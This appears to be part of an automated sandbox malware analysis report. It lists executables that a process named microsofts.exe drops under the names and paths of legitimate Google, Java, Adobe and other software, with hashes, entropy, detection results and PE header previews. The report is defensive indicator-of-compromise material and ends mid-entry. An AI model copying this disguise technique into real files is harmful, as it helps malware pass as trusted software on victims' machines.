Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.094638135743706
Encrypted:	false
SSDEEP:	49152:OGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLsDmg27RnWGj:q4OEtwiICvYMRfMD527BWG
MD5:	C90F4D42801E901D3C477A99C11B3DBF
SHA1:	6514BEE2C93F4D4DF34F702491FFD0C1884D62AF
SHA-256:	8F83AC7FB2A6D5837714F977DE4930D88C2798ACD26EC6B540F3D8D24060CAD6
SHA-512:	2CA7A9D79BFD426C67C8A61B01F51D2DB754AFC09504725B9AD53C4FF866AF6267725FFBC5716D3D7B2ECC1395432F9B10BB8FA978373C14A81D5977CE0D1558
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......#-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1485824
Entropy (8bit):	5.4964185885722525
Encrypted:	false
SSDEEP:	24576:WAMuR+3kMbVjhvsqjnhMgeiCl7G0nehbGZpbD:7D+lbVjhTDmg27RnWGj
MD5:	3702B5A9CEA6E32FC107AEAA88AF836C
SHA1:	A35FAAA4D8CEA8122C9465ABB1B7C0925F5F45B1
SHA-256:	33BD6CEC2C434B17DD562624868A5AB168483F359311F86742BFC9ED065AE4C3
SHA-512:	E761F5517C5D7CCF7A2E945DB18BDDA4179C2BC9E9FF5B5E11C5DF8BED9D7E3A43AAE3DEEC6EA7BB6354DA2D5AB653BB4CF86C604F64B02B0537312F0212909F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.................................~........................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.27777303151631
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl3SXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlisqjnhMgeiCl7G0nehbGZpbD
MD5:	9E9B78716BD412D23B2EA0DE8EED7907
SHA1:	9318D3D9218E347952C65DE90E63ED9159B2829F
SHA-256:	BAA012DB6EC3CBBB0544B4886A49176F119DCFD30C0E1A7905CCE83327CCAD9A
SHA-512:	FA8D4D7E4E6CC2C40EF1BAA4AE9A95DD1E2681F2DCC9626D1C7203EA3C7F7143F9D911912A085D4C6896373EB4880F5B1ACCB93430F2126B05D8E0DFA6D0ADC6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1644544
Entropy (8bit):	5.694822283485904
Encrypted:	false
SSDEEP:	24576:e0vHyeLj8trn3wslsqjnhMgeiCl7G0nehbGZpbD:Ptj4rgsZDmg27RnWGj
MD5:	EBF04DF83386EAE8B9357D3A30AB4076
SHA1:	849933F8D2BFBCF1864C480D3AA82B57549B0E23
SHA-256:	043CD97D94523D921AD3127FF117942FB7CB24C648854AC7F1EA62DACB44F1F2
SHA-512:	13FB943DB0C4AAFF6F605FC3FA455835541E3F4FA44BD0093A44496DEFA56248CCE3086E71FB40C860F9039B2C17F28249E351331C22869E965DC34053119327
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`.......?......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.279693715892556
Encrypted:	false
SSDEEP:	24576:LoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZgsqjnhMgeiCl7G0nehbGZpv:C4i0wGJra0uAUfkVy7/ZcDmg27RnWGj
MD5:	C496FC1E70D08711FD6691EC042EC562
SHA1:	F9A401FE888D7B73FE39E555254FB9F12087E941
SHA-256:	5E503F3AEA455F01D521173F5B6FBFE6621AD7DCE0B9A0D5D61BB2A7BCE7D033
SHA-512:	982AA364A0FCE7B57F1811A973A50FAFA2DE753C83E2A5EA24E1B8FB0373A17C90B46D0C3FF7D772765AC374A8487F23F4DD27DE14485F21D8CCB1E9D64EDAEC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@..................................D..........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.44879143885014
Encrypted:	false
SSDEEP:	24576:VeR0gB6axoCf0R6RLQRF/TzJqe58BimHsqjnhMgeiCl7G0nehbGZpbD:HgHxmR6uBTzge5MimbDmg27RnWGj
MD5:	DFD27DBF9B2887C9AE6616193F2F1CCE
SHA1:	CC8879A0D10EB3E94EB3279DF33F3FA2B34FEA7F
SHA-256:	FB531520EC95B256C2BEE96DBCBCBE48DA73A1B07E4BF2F2379AF9A1589B4F91
SHA-512:	E3564449E367BF7278B527C6A4C45A85CFF507D844D588A795739C5B99D8834A31D0854502283F47D24E935E92BE1D8AA119B59A1522E829D594304BFFA57710
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446086375834254
Encrypted:	false
SSDEEP:	12288:gnEbH0j4x7R6SvyCMVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:gkwOtO7VsqjnhMgeiCl7G0nehbGZpbD
MD5:	DA7973939FEABCC6587F4EECBE3BA709
SHA1:	4592D64177C4A223C372E589FA1C3427259EBFCC
SHA-256:	DDE10C5AB27D4E1B43370C8B60631894E9B83A955EB49C3B2A0989254429C5A8
SHA-512:	BD2A163D71CB100E1D87C906BEB8563DD8B93849BE1B27D866756EE528E6859DF8EDB1B31D94DB821AD79932DD474E85F1D1B6B2BE5F5DC6AABF004E187EBD44
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......8........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446839284711521
Encrypted:	false
SSDEEP:	24576:FpnU/h/4KusqjnhMgeiCl7G0nehbGZpbD:rU/VCDmg27RnWGj
MD5:	BB1568FAF99F4F4E4A2D688CF3DE4603
SHA1:	91C73C29DDCD189E5BC816F29DEABB021B56DEA0
SHA-256:	138E80DE809CFF8E18A936CE37ED1F1064E9E214510ED31549DFAA10F90B5F5D
SHA-512:	4A64B712311408E01219D62242DAC5B34EAD8B9998B18228BCA78097CAC2B040340CAD25234A492BAC084C0C3768802AE5D9389C6D4B629AD07FAEBBAACACB77
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483758957582643
Encrypted:	false
SSDEEP:	24576:kx71iBLZ05jNTmJWExhsqjnhMgeiCl7G0nehbGZpbD:kxhiHIjNg1Dmg27RnWGj
MD5:	8507383ECEEA8B0AB4887AEB0BA7BFF8
SHA1:	3B42FE1DE73F7249F9397453336D6A977A46FDD8
SHA-256:	2FF906C77DEAB11BC560E729981842887F83CA2B85B5A189BCD10BCD9F8803BE
SHA-512:	368ABA34802A0150A4A850157EC2110FCD8C69AE1E7F1B92F3D4331656BD0D456A3AF0BEF987473CD5A5078383E50B988C760B57EC97CADDAF0E932A4047B2D6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.46673978750101
Encrypted:	false
SSDEEP:	24576:ClnRklQ6fgJcEwixvsqjnhMgeiCl7G0nehbGZpbD:2oRfgJcEwCTDmg27RnWGj
MD5:	F1300384AF46C9548742C6147381BAED
SHA1:	B73D6D12FCFD4CD67EA6A259D2746FAFEF8EA7D9
SHA-256:	5C9030A9C53DDD819AD766A41DE9DEFBF522865A39ACC6B64013E4B577E979C2
SHA-512:	0687774B412445CAFF493CFCA0275DB8808B2A9C3F14043CC3D2CD420EC3137EFC2E038BFCE1ECC42479AB38D9D8FE8AD61F013CFE9B70254612A134BD612950
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................B......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1522176
Entropy (8bit):	5.496545810026194
Encrypted:	false
SSDEEP:	24576:cW25k8hb0Haw+x/sqjnhMgeiCl7G0nehbGZpbD:cWyk8SHawmjDmg27RnWGj
MD5:	09BB85222B2495E26256E86B71CCC4FB
SHA1:	2D3E4C33E3DCCBC78ED9980BA697A2016610127C
SHA-256:	9216F6013C0BDC341B7D47B916AB0EC40F4DCCFFAB037B4834BE628C0082A04E
SHA-512:	D1EDAEAD077692E618B734957C488365950A2E000164B3F68E55CBE7941F83EAA0506BF550D52EC692CE693AA05E607258BD4A9BE420F1C79D826C5EC5CB6C9F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................n..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	5.163963758877397
Encrypted:	false
SSDEEP:	12288:CWP/aK2vB+UXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:CKCKAB3sqjnhMgeiCl7G0nehbGZpbD
MD5:	24F516DED20655F562C246C28897824C
SHA1:	6902C4D83482CE95C4E6684F938135B39762434A
SHA-256:	FDE4822CC8C09E881C850849E5D8871907B84CCC1D48744BEB1AC0EED938B339
SHA-512:	4C2CEE7176E7F6303F8E292DE331BE71CCA9E5F08CAD463CECB9C4FEDB9225E48360E8229890BD60C6540A7B850FBB8B88EEEE367AFD39238CECB9B8DE60A4E1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162047444465475
Encrypted:	false
SSDEEP:	12288:hO7cCNWB+09eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:wjNWBPEsqjnhMgeiCl7G0nehbGZpbD
MD5:	53FCAD3E621823D3505E7D268975227E
SHA1:	88B6BFFC960931ECE6916FBF035BD7595D95ABE3
SHA-256:	CA345344EB38F6AFAF7F84BC5A4AE30BCD55CA6D07CBC61671A58ECF87480E55
SHA-512:	FA91EAF0E7D538AF03C03693EE33412E09265339FEAD4B2E81A72B1F21A8FC65C6F1301C2387650559A685751897E0C84C0A38F4DECE34807F8A7745E07FFE35
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..................................3.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	5.238944874100267
Encrypted:	false
SSDEEP:	24576:gihRyhdsRrysqjnhMgeiCl7G0nehbGZpbD:gihsoR2Dmg27RnWGj
MD5:	C5A3298CBDB35769EDAA0662F6FAB03C
SHA1:	93D021486FCD85E33895305493B6E78149FF336F
SHA-256:	874F818EA0C3BF6E4F4A90FBF44A238BDC4CF095BA8AB4570CE16B88F1BD1110
SHA-512:	ED49657FBD7387C44986482A4EA5EFBBD2AFD9ADF789FD9326E862BE749C4A939E83F53B70B142471A9CDB260572D7F89B35F667D29BB5FFCB83344083E8CFAC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	5.351031727073888
Encrypted:	false
SSDEEP:	24576:m1FDmRF+wpx/Qaf9sqjnhMgeiCl7G0nehbGZpbD:wmRF+wn/JfhDmg27RnWGj
MD5:	F0B3D9F1F395B95DD066F90B5E174866
SHA1:	2DB33AB2A12E54E9920B4381D77E34769271642A
SHA-256:	054B8CB4F3EC81D50875467BF72BEA5F5A4CCDEFA3A25381C0127ABDB07ACABF
SHA-512:	135CD0D98475C1458E9B62B78EEE8D1670EEB1ACAD48A9E9016464B064A79BB578FD89911BD475ACC28B9861CE6AB1AB92E42F24845BBD147EA4A71D9D62D16D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................\z...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162007797212151
Encrypted:	false
SSDEEP:	12288:E2Ae621B+0YAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:hE21BP7sqjnhMgeiCl7G0nehbGZpbD
MD5:	90887CB97789A953FDB8DB5FF74A3B6D
SHA1:	46D27B97F1B0606A497BD6E740B787BECD0D126F
SHA-256:	528DB0BCA4CD58648849063E9A8B5FE97ADEF23844A2A5C1C0A66A4E9289B239
SHA-512:	2736BB73DD9A62119B605F0538EB4911E6DA5B55262AD3BC740C4EFD5FF804F372C69173D236A0DF573172330119E0284BA3D3D01A5C3D5357AE9886C62FBD6A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................:t.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999989850198587
Encrypted:	true
SSDEEP:	3145728:aLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:YBWx/pt8U7E6aZRfIICU
MD5:	EB87E95993BF2C80A2B1570CA1CD9683
SHA1:	2DCAFB2CFD075FD2DF38C08EC281857694A724D5
SHA-256:	11083CE555B38286830132B72589DBECD6C833E470753F53569F0A902F85F6C9
SHA-512:	FF01D7594B6234FA541E28E24521FB78F61B80514504AAAEE0D96883CB07C0A2FF4D9646F6B2302049F757B29FA2FCEE28D87528C8688070B8019A10173CDA3C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L......GM... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1158144
Entropy (8bit):	5.068097864221754
Encrypted:	false
SSDEEP:	12288:t3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t3sqjnhMgeiCl7G0nehbGZpbD
MD5:	11469C2C9955C73F2418B91FAE55BC05
SHA1:	F9F664862F2AF847F760D0E1755483ADA5F23212
SHA-256:	183B8C9034828D6325889AEE8B3EFE480FC4B2775C53E949342A9B01057D0556
SHA-512:	E131FD253A6CA54853B1F07C3E51091A488D24958421B12320F172A94AEBFAF9A51909468CC789FA08ED7F14032A5C47E33210B7604FD005BBDBE6A3D415620D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................Qy......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.03242338670573
Encrypted:	false
SSDEEP:	12288:PK0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:y0sqjnhMgeiCl7G0nehbGZpbD
MD5:	EABB55F19B543F023FB02A1C94742884
SHA1:	E3CFDC71F9763EC51B73EABA07DF6A2C3E300571
SHA-256:	A23BAFB81FBCBE95D78BEF82AF15DC575E1F9B7F26683B9D6B239D24FEA740D9
SHA-512:	CE052D5E75A659E9C34A30BD7D4837867BFFD593194CB386E55B81637609C5B87A4AA821C309E3B8A346AD48EFBB4DE7A225795112EBF74AD9D81077FA880AFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................M.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
